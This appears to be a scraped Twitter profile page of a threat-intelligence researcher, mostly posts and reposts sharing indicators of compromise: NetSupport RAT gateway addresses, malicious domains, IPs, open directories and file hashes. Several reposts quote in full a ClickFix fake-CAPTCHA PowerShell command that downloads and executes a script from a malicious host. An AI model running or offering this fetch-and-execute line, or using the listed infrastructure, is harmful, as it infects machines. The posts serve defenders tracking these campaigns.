 
                                Germán Fernández
@1zrr4h
🏴☠️ OFFENSIVE-INTEL 🏴☠️ Cyber Threat Intelligence by Hackers | Security Researcher en CronUp.com | @CuratedIntel Member | 🥷🧠🇨🇱
ID: 37090957
http://www.offensive-intel.com 02-05-2009 00:36:28
31,31K Tweet
33,33K Followers
563 Following
 
         
        Germán Fernández Nico Tech Tips Also looks as related infra to cupertujo\.com: idaculipa\.com manzisuape\.com siperasul\.com
 
                        
                    
                    
                    
                 
         
         
         
         
         
         
         
         
         
        #netsupport #rat client32.ini First Submission 2025-07-14 MD5 ec0df04e3acb6f4390e9b29fcfc38089 GatewayAddress=193.143.1.216:443 👇 bazaar.abuse.ch/sample/dba4f8b… cc Mikhail Kasimov ܛܔܔܔܛܔܛܔܛ TG Soft TomU | I'm still here... til the end 🕊️🇨🇭 Germán Fernández Gianni Amato Simplicio Sam L. Andrea (Drego) Draghetti 👨🏻💻 🎣
 
         
        #booking #fakecaptcha #clickfix 👇 https://admin-properties-captcha.]com/sign-in? 👇 powershell -Command "iex ((New-Object Net.WebClient).DownloadString('https://bknpnt.]com/bkngpntqow'))" Samples👇 bazaar.abuse.ch/browse/tag/bkn… ▶️AnyRun app.any.run/tasks/3deb10bd… cc Mikhail Kasimov Kelsey
![JAMESWT (@jameswt_wt) on Twitter photo #booking #fakecaptcha #clickfix
👇
https://admin-properties-captcha.]com/sign-in?
👇
powershell -Command "iex ((New-Object Net.WebClient).DownloadString('https://bknpnt.]com/bkngpntqow'))"
Samples👇
bazaar.abuse.ch/browse/tag/bkn…
▶️AnyRun
app.any.run/tasks/3deb10bd…
cc <a href="/500mk500/">Mikhail Kasimov</a> <a href="/k3dg3/">Kelsey</a> #booking #fakecaptcha #clickfix
👇
https://admin-properties-captcha.]com/sign-in?
👇
powershell -Command "iex ((New-Object Net.WebClient).DownloadString('https://bknpnt.]com/bkngpntqow'))"
Samples👇
bazaar.abuse.ch/browse/tag/bkn…
▶️AnyRun
app.any.run/tasks/3deb10bd…
cc <a href="/500mk500/">Mikhail Kasimov</a> <a href="/k3dg3/">Kelsey</a>](https://pbs.twimg.com/media/Gv4PZlpWIAEQJVm.jpg) 
                        
                    
                    
                    
                 
         
                        ![Germán Fernández (@1zrr4h) on Twitter photo ⚠️ "New" #CrazyEvil campaign 🇷🇺
Landing domain: rivatalk[.]com
As usual, there is a signed malware for Windows ("Heze Hongwei Network Technology Co., Ltd.") and one also for macOS.  
[+] Windows sample: virustotal.com/gui/file/4a802… ⚠️ "New" #CrazyEvil campaign 🇷🇺
Landing domain: rivatalk[.]com
As usual, there is a signed malware for Windows ("Heze Hongwei Network Technology Co., Ltd.") and one also for macOS.  
[+] Windows sample: virustotal.com/gui/file/4a802…](https://pbs.twimg.com/media/Guzcny-WQAAQgqg.jpg) 
                         
                         
                         
                        ![chum1ng0/bsky-security research (@chum1ng0) on Twitter photo 🚨#Chile🇨🇱: actor malicioso vende una base de datos con 248.589 datos del Malls & Outlets VIVO, <a href="/mallsoutletvivo/">Malls & Outlets VIVO</a> en un foro de hacking.
mallsyoutletsvivo[.]cl
gracias <a href="/mbec03/">TIAL</a>. 
#ciberseguridad #latinoamérica #LATAM #databreach 🚨#Chile🇨🇱: actor malicioso vende una base de datos con 248.589 datos del Malls & Outlets VIVO, <a href="/mallsoutletvivo/">Malls & Outlets VIVO</a> en un foro de hacking.
mallsyoutletsvivo[.]cl
gracias <a href="/mbec03/">TIAL</a>. 
#ciberseguridad #latinoamérica #LATAM #databreach](https://pbs.twimg.com/media/GvHNlyXXEAAa0K2.png) 
                         
                        ![JAMESWT (@jameswt_wt) on Twitter photo #netsupport #rat 
GatewayAddress=summer25hot.]org:443
88.218.93[.]71
Main Sample from <a href="/abuse_ch/">abuse.ch</a> 
👇👇👇
bazaar.abuse.ch/browse/tag/sum…
Client32.ini
dabe4273412d4d8ae67e8bc1786b3eac
⚠️First Sub 2025-07-07
LIC
7215675bdba98bd30c8e89aafba519de
⚠️First Sub 2025-06-19
cc <a href="/500mk500/">Mikhail Kasimov</a> <a href="/k3dg3/">Kelsey</a> #netsupport #rat 
GatewayAddress=summer25hot.]org:443
88.218.93[.]71
Main Sample from <a href="/abuse_ch/">abuse.ch</a> 
👇👇👇
bazaar.abuse.ch/browse/tag/sum…
Client32.ini
dabe4273412d4d8ae67e8bc1786b3eac
⚠️First Sub 2025-07-07
LIC
7215675bdba98bd30c8e89aafba519de
⚠️First Sub 2025-06-19
cc <a href="/500mk500/">Mikhail Kasimov</a> <a href="/k3dg3/">Kelsey</a>](https://pbs.twimg.com/media/GvQGZ2WXgAAC3cA.jpg) 
                        ![Germán Fernández (@1zrr4h) on Twitter photo ▪ http://148.135.120[.]162:8443/ #opendir with Go2bypass and something else 🤔
🔸 "svchost.exe": 28e318a9ed1580a14ef9b6a71d6a0ec5031aae9d2b748b2ed70c67cfa24a85b4 (Go2bypass)
🔸 "ws_linux_amd64": 6ce0e2df1698a965627bd7afa2cf58a86cdb3cc691a150b0ad0e19eaa49c0481 (VShell?)
🔸 ▪ http://148.135.120[.]162:8443/ #opendir with Go2bypass and something else 🤔
🔸 "svchost.exe": 28e318a9ed1580a14ef9b6a71d6a0ec5031aae9d2b748b2ed70c67cfa24a85b4 (Go2bypass)
🔸 "ws_linux_amd64": 6ce0e2df1698a965627bd7afa2cf58a86cdb3cc691a150b0ad0e19eaa49c0481 (VShell?)
🔸](https://pbs.twimg.com/media/GvxEr6JXMAAo2TJ.jpg) 
                        ![Germán Fernández (@1zrr4h) on Twitter photo 🔸 http://196.251.71[.]46/ #opendir
The HTML pages abuse Microsoft's search-ms URI protocol to open a remote WebDAV server at 45.151.62[.]238 and initiate the infection chain via LNK files that look like PDF's 😏
[+] "Adobe Acrobat.exe": bazaar.abuse.ch/sample/1cdce73… 🔸 http://196.251.71[.]46/ #opendir
The HTML pages abuse Microsoft's search-ms URI protocol to open a remote WebDAV server at 45.151.62[.]238 and initiate the infection chain via LNK files that look like PDF's 😏
[+] "Adobe Acrobat.exe": bazaar.abuse.ch/sample/1cdce73…](https://pbs.twimg.com/media/Gv1qCl3XYAEwo7O.png)